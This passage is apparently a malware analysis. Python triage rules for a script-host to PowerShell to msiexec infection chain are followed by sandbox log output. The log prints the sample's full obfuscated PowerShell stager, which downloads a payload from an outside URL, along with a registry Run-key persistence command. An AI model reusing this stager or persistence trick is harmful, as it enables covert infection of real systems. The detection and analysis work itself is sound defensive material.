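SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUN_KEY = re.compile(r"\\currentversion\\run\b", re.I)
ENV_EXPANSION = re.compile(r"%[^%\s]+%")

def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def script_host_spawns_powershell(e: ProcEvent) -> bool:
    return _name(e.parent) in SCRIPT_HOSTS and _name(e.image) == "powershell.exe"

def oversized_powershell(e: ProcEvent, limit: int = 4096) -> bool:
    # The stager's command line was 7112 bytes; interactive or scheduled use
    # rarely comes close. Combine with the other rules before alerting.
    return _name(e.image) == "powershell.exe" and len(e.cmdline) > limit

def indirect_run_key_persistence(e: ProcEvent) -> bool:
    """reg.exe writing a REG_EXPAND_SZ Run value whose data expands an
    environment variable (here the interpreter path) and pulls the real
    script out of another registry value with GetValue(), so the Run entry
    itself never contains the payload."""
    c = e.cmdline
    return (_name(e.image) == "reg.exe" and RUN_KEY.search(c) is not None
            and "REG_EXPAND_SZ" in c.upper() and ENV_EXPANSION.search(c) is not None
            and ".getvalue(" in c.lower())

def argless_msiexec_from_powershell(e: ProcEvent) -> bool:
    # Windows Installer is never launched bare by PowerShell; an argument-less
    # msiexec.exe under it is a hollowing host, as in this report.
    return (_name(e.parent) == "powershell.exe" and _name(e.image) == "msiexec.exe"
            and _name(e.cmdline.strip().strip('"')) == "msiexec.exe")

RULES = [
    ("script_host_spawns_powershell", script_host_spawns_powershell),
    ("oversized_powershell", oversized_powershell),
    ("argless_msiexec_from_powershell", argless_msiexec_from_powershell),
    ("indirect_run_key_persistence", indirect_run_key_persistence),
]

def triage(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """(event index, rule name) for every rule each event trips, in order."""
    return [(i, name) for i, e in enumerate(events) for name, rule in RULES if rule(e)]

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REG_CMD = (r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" '
           r'/t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 '
           r"$Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');"
           r'%Markoerpositioner% ($Skan)"')

EVENTS = [
    # the chain from the report; "A" * 7000 stands in for the obfuscated body
    ProcEvent(r"C:\Windows\System32\wscript.exe", PS64,
              f'"{PS64}" "echo $Hles;function Strejflyset($Chefkokkes){{ .($Postlachrymal) ($Chefkokkes)}} '
              + "A" * 7000 + '"'),
    ProcEvent(PS32, r"C:\Windows\SysWOW64\msiexec.exe", r'"C:\Windows\SysWOW64\msiexec.exe"'),
    ProcEvent(r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ' + REG_CMD),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\reg.exe", REG_CMD),
    # constructed benign events
    ProcEvent(r"C:\Windows\explorer.exe", PS64, f'"{PS64}" -NoProfile -Command Get-Date'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r'REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v OneDrive /t REG_SZ '
              r'/d "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"'),
]

if __name__ == "__main__":
    for idx, rule in triage(EVENTS):
        print(f"event {idx}: {rule}")
```

The persistence rule deliberately keys on the shape of the data (expand-string, environment-variable expansion, a `GetValue` read) rather than on the value name `Motorskib` or the key `HKCU\Software\Fjeldrreder`, which change per build; the value name and key are what you would add as IOCs for this specific sample.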
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edgegdi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: .Automation.pdb source: powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdbs source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdba source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($D", "0")
            Source: Yara match | File source: 00000004.00000002.128210723875.0000000009E7D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Overcompetition)$GlOBaL:frySedISkenEs = [sysTEm.tEXt.encOdING]::asCII.GEtSTrING($vEJLeDERenS)$glOBAl:lNGsELsFUldt=$FrysEDiskEnes.subStRiNG($oCCIPItAllynsuCkEN,$OvErLdER)<#Cricketed N
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Fredsforstyrreres $Kampmodet57 $Eftertackling), (Yurak205 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Cabirean = [AppDomain]::CurrentDomain.GetAssembli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Vaerker)), $Kremersphaltus).DefineDynamicModule($Udkoblings, $false).DefineType($Rygradenes, $Konspirationernes184, [System.MulticastD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Overcompetition)$GlOBaL:frySedISkenEs = [sysTEm.tEXt.encOdING]::asCII.GEtSTrING($vEJLeDERenS)$glOBAl:lNGsELsFUldt=$FrysEDiskEnes.subStRiNG($oCCIPItAllynsuCkEN,$OvErLdER)<#Cricketed N
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra.
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst 